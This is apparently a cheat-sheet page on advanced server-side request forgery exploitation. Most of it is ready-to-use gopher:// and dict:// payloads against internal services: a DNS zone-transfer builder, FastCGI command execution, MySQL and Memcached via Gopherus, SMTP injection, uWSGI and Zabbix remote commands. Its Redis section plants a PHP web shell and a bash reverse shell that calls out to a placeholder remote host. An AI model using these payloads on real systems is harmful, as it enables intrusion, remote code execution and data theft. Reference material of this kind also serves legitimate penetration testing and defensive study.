7.2 KiB
SSRF Advanced Exploitation
Some services (e.g., Redis, Elasticsearch) allow unauthenticated data writes or command execution when accessed directly. An attacker could exploit SSRF to interact with these services, injecting malicious payloads like web shells or manipulating application state.
Summary
DNS AXFR
Query an internal DNS resolver to trigger a full zone transfer (AXFR) and exfiltrate a list of subdomains.
from urllib.parse import quote
domain,tld = "example.lab".split('.')
dns_request = b"\x01\x03\x03\x07" # BITMAP
dns_request += b"\x00\x01" # QCOUNT
dns_request += b"\x00\x00" # ANCOUNT
dns_request += b"\x00\x00" # NSCOUNT
dns_request += b"\x00\x00" # ARCOUNT
dns_request += len(domain).to_bytes() # LEN DOMAIN
dns_request += domain.encode() # DOMAIN
dns_request += len(tld).to_bytes() # LEN TLD
dns_request += tld.encode() # TLD
dns_request += b"\x00" # DNAME EOF
dns_request += b"\x00\xFC" # QTYPE AXFR (252)
dns_request += b"\x00\x01" # QCLASS IN (1)
dns_request = len(dns_request).to_bytes(2, byteorder="big") + dns_request
print(f'gopher://127.0.0.1:25/_{quote(dns_request)}')
Example of payload for example.lab
: gopher://127.0.0.1:25/_%00%1D%01%03%03%07%00%01%00%00%00%00%00%00%07example%03lab%00%00%FC%00%01
curl -s -i -X POST -d 'url=gopher://127.0.0.1:53/_%2500%251d%25a9%25c1%2500%2520%2500%2501%2500%2500%2500%2500%2500%2500%2507%2565%2578%2561%256d%2570%256c%2565%2503%256c%2561%2562%2500%2500%25fc%2500%2501' http://localhost:5000/ssrf --output - | xxd
FastCGI
Requires to know the full path of one PHP file on the server, by default the exploit is using /usr/share/php/PEAR.php
.
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3F%3E%00%00%00%00
Memcached
Memcached communicates over port 11211 by default. While it is primarily used for storing serialized data to enhance application performance, vulnerabilities can arise during the deserialization of this data.
python2.7 ./gopherus.py --exploit pymemcache
python2.7 ./gopherus.py --exploit rbmemcache
python2.7 ./gopherus.py --exploit phpmemcache
python2.7 ./gopherus.py --exploit dmpmemcache
MySQL
MySQL user should not be password protected.
$ python2.7 ./gopherus.py --exploit mysql
Give MySQL username: root
Give query to execute: SELECT 123;
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0c%00%00%00%03%53%45%4c%45%43%54%20%31%32%33%3b%01%00%00%00%01
Redis
Redis is a database system that stores everything in RAM
The attacker changes Redis's dump directory to the web server's document root (/var/www/html
) and renames the dump file to file.php
, ensuring that when the database is saved, it generates a PHP file. They then create a Redis key (mykey
) containing the web shell code, which enables remote command execution via HTTP GET parameters. Finally, the SAVE
command forces Redis to write the current in-memory database to disk, resulting in the creation of the malicious web shell at /var/www/html/file.php
.
CONFIG SET dir /var/www/html
CONFIG SET dbfilename file.php
SET mykey "<?php system($_GET[0])?>"
SAVE
-
Getting a webshell with
dict://
dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" dict://127.0.0.1:6379/SAVE
-
Getting a PHP reverse shell with
gopher://
gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 gopher://127.0.0.1:6379/_save
SMTP
Malicious actors can craft gopher://
URLs to manipulate low-level protocols (like HTTP or SMTP) on internal systems.
gopher://localhost:25/_MAIL%20FROM:<attacker@example.com>%0D%0A
The following PHP script can be used to generate a page that will redirect to the gopher://
payload.
<?php
$commands = array(
'HELO victim.com',
'MAIL FROM: <admin@victim.com>',
'RCPT To: <hacker@attacker.com>',
'DATA',
'Subject: @hacker!',
'Hello Friend',
'.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://0:25/_'.$payload);
?>
WSGI
Exploit using the Gopher protocol, full exploit script available at wofeiwo/webcgi-exploits/uwsgi_exp.py.
gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
Header | ||
---|---|---|
modifier1 | (1 byte) | 0 (%00) |
datasize | (2 bytes) | 26 (%1A%00) |
modifier2 | (1 byte) | 0 (%00) |
Variable (UWSGI_FILE) | |||
---|---|---|---|
key length | (2 bytes) | 10 | (%0A%00) |
key data | (m bytes) | UWSGI_FILE | |
value length | (2 bytes) | 12 | (%0C%00) |
value data | (n bytes) | /tmp/test.py |
Zabbix
If EnableRemoteCommands=1
is enabled in the Zabbix Agent configuration, it allows the execution of remote commands.
gopher://127.0.0.1:10050/_system.run%5B%28id%29%3Bsleep%202s%5D